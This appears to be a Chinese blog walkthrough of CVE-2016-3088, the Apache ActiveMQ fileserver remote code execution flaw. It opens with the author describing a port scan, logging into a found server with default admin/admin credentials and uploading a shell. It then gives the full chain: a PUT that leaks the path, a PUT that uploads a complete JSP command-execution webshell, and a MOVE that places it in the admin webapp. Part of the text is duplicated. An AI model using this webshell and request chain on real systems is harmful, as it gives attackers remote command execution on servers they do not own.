Apache ActiveMQ Fileserver远程代码执行漏洞
2017-08-25 21:46
621 查看
扫端口的时候遇到8161端口,输入admin/admin,成功登陆,之前就看到过相关文章,PUT了一句话上去,但是没有什么效果,于是本地搭建了一个环境,记录一下测试过程。
解压后,双击运行abtivemq.bat运行。(进入bin目录,根据自己的操作系统选择win32或win64,5.1.0只有win32目录)
访问8161端口:
2、PUT 一个 Jsp 的 Webshell 到 fileserver 目录
jsp webshell,可以执行,尝试上传了收集的一些木马,都报错了。。。
3、利用 MOVE 方法将 Webshell 移入 admin/ 目录
4、成功执行webshell权限
参考文章:
ActiveMQ安装部署(Windows) http://blog.csdn.net/clj198606061111/article/details/38145597
Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088) https://www.seebug.org/vuldb/ssvid-96268
环境搭建:
ActiveMQ 5.1.0 下载地址:http://activemq.apache.org/activemq-510-release.html解压后,双击运行abtivemq.bat运行。(进入bin目录,根据自己的操作系统选择win32或win64,5.1.0只有win32目录)
访问8161端口:
漏洞利用:
1、 获取物理路径PUT /fileserver/%20/%20 HTTP/1.1
2、PUT 一个 Jsp 的 Webshell 到 fileserver 目录
PUT /fileserver/1.jsp HTTP/1.1
jsp webshell,可以执行,尝试上传了收集的一些木马,都报错了。。。
<%@ page import="java.io.*"%> <% out.print("Hello</br>"); String strcmd = request.getParameter("cmd"); String line =null; Process p=Runtime.getRuntime().exec(strcmd); InputStream is = p.getInputStream(); BufferedReader br = new BufferedReader(new InputStreamReader(is)); while((line =br.readLine())!=null){ out.print(line+"<br>"); } %>
3、利用 MOVE 方法将 Webshell 移入 admin/ 目录
MOVE /fileserver/1.jsp HTTP/1.0 Destination:file://C:\activemq\webapps\admin\11.jsp
4、成功执行webshell权限
参考文章:
ActiveMQ安装部署(Windows) http://blog.csdn.net/clj198606061111/article/details/38145597
Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088) https://www.seebug.org/vuldb/ssvid-96268
相关文章推荐
- Apache Tomcat CVE-2017-12615远程代码执行漏洞分析
- Activemq远程代码执行漏洞
- 看我如何利用Atom编辑器的漏洞实现远程代码执行
- 安全专家发现Edge零日漏洞:可远程执行代码
- PayPal站点的远程代码执行漏洞演示【附视频】
- Struts 2最新0day破坏性漏洞(远程任意代码执行)等的重现方法
- Git中的远程代码执行漏洞已被修复 多个工具受影响
- Apache Struts2远程命令执行漏洞呈爆发趋势
- JBOSS远程代码执行漏洞
- ElasticSearch Groovy脚本远程代码执行漏洞
- 齐博cms最新SQL注入网站漏洞 可远程执行代码提权
- OrientDB远程代码执行漏洞利用与分析
- WordPress 3.5.1远程代码执行漏洞
- Microsoft远程桌面协议RDP远程代码可执行漏洞(CVE-2012-0002)(MS12-020)
- Struts2/XWork < 2.2.0远程执行任意代码漏洞分析及修补
- 某远程代码执行漏洞影响超过70个不同的CCTV-DVR供应商的漏洞分析
- 【渗透测试】ApacheTomcat 远程代码执行漏洞复现CVE-2017-12615
- IIS7 HTTP.sys远程代码执行漏洞
- FreeBSD telnetd守护程序远程代码执行漏洞
- Fastjson 爆出远程代码执行高危漏洞